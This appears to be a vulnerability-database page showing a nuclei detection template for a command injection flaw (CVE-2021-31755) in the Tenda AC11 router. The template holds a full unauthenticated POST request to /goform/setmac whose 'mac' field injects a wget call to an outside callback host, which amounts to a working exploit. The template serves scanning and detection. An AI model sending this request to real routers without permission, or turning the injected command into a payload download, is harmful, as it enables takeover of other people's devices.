Lucene search
K

Tenda Router AC11 - Remote Command Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 68 Views

Tenda Router AC11 - Remote Command Injection. Vulnerable to unauthenticated remote command injection attacks through the web-based management interface. Allows unauthorized access, data exfiltration, and complete compromise of the affected router

Related
Refs
Code
id: CVE-2021-31755

info:
  name: Tenda Router AC11 - Remote Command Injection
  author: gy741
  severity: critical
  description: Tenda Router AC11  is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data exfiltration, and complete compromise of the affected router.
  remediation: |
    Apply the latest firmware update provided by Tenda to fix the remote command injection vulnerability (CVE-2021-31755).
  reference:
    - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3
    - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31755
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
    - https://github.com/Yu3H0/IoT_CVE
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-31755
    cwe-id: CWE-787
    epss-score: 0.85849
    epss-percentile: 0.99701
    cpe: cpe:2.3:o:tenda:ac11_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: tenda
    product: ac11_firmware
  tags: cve2021,cve,tenda,rce,oast,router,mirai,kev,vkev,vuln

http:
  - raw:
      - |
        POST /goform/setmac HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/index.htmlr
        Content-Type: application/x-www-form-urlencoded

        module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a0047304502204561dfb869e332ff5dd14b6483e5886cb3b3eba80cdc7708556feae7e780ea220221009e01fe6d89f7ca533c584f8bd7e7a240fc321326446c7a9a6b2487818886e105:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
CVSS 210
EPSS0.85849
SSVC
68